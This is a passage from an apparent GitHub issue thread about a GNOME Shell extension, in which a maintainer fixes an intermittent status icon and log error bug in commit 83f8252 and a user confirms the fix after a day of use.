I could randomly reproduce the errors in log twice (no indicator glitch however), when locking/unlocking I think. Will continue to dig !

**Comment by RaphaelRochet** [comment]
I think I fixed it, was a weird one if I'm right :thinking: . At least errors in log, it seems I can't reproduce them anymore.
Can you try latest extension.js (from 83f8252 or later) ?

**Comment by 2-4601** [comment]
Thanks. I just installed 83f82525b16624c75a2f946ea095881889b10fdf. I will run it for a while and let you know if I still encounter the issue with this version. :slightly_smiling_face:

**Comment by 2-4601** [comment]
I haven't experienced the original issue with the status icon since using 83f82525b16624c75a2f946ea095881889b10fdf. Also haven't encountered Gnome Shell stack traces that directly reference files from this extension.

When I was running v62, I ecountered the issue several times per day, and now it has been more than 24 hours and everything seems normal again. Thanks for the fix!
